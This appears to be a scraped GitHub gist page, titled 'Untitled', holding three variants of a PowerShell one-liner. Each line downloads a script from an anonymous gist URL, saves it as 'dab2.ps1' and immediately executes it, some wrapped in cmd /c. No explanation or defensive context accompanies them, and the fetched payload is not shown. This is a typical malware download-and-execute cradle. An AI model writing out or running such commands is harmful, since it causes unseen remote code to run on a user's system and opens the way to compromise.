Skip to content

Instantly share code, notes, and snippets.

@elagrija
Created January 7, 2018 14:07
Show Gist options
  • Save elagrija/cb9b0fcf64a0be11b8543a07ac7c27c0 to your computer and use it in GitHub Desktop.
Save elagrija/cb9b0fcf64a0be11b8543a07ac7c27c0 to your computer and use it in GitHub Desktop.
Untitled
PowerShell (New-Object System.Net.WebClient).DownloadFile('https://gist.github.com/anonymous/b6a00e5890fc129812a76930c2a2471e/3d5a18cdf870fc0df7bb1ef60d164a93f02e164a','dab2.ps1');(New-Object -com Shell.Application).ShellExecute('dab2.ps1');
cmd /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('https://gist.github.com/anonymous/b6a00e5890fc129812a76930c2a2471e/3d5a18cdf870fc0df7bb1ef60d164a93f02e164a','dab2.ps1');(New-Object -com Shell.Application).ShellExecute('dab2.ps1'); "
cmd /c "PowerShell (New-Object System.Net.WebClient).DownloadFile('https://gist.github.com/anonymous/b6a00e5890fc129812a76930c2a2471e/3d5a18cdf870fc0df7bb1ef60d164a93f02e164a','dab2.ps1');Start-Process 'dab2.ps1';"
<!-- content to be placed inside <body>…</body> -->
// alert('Hello world!');
{"view":"split","fontsize":"100","seethrough":"","prefixfree":"1","page":"all"}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment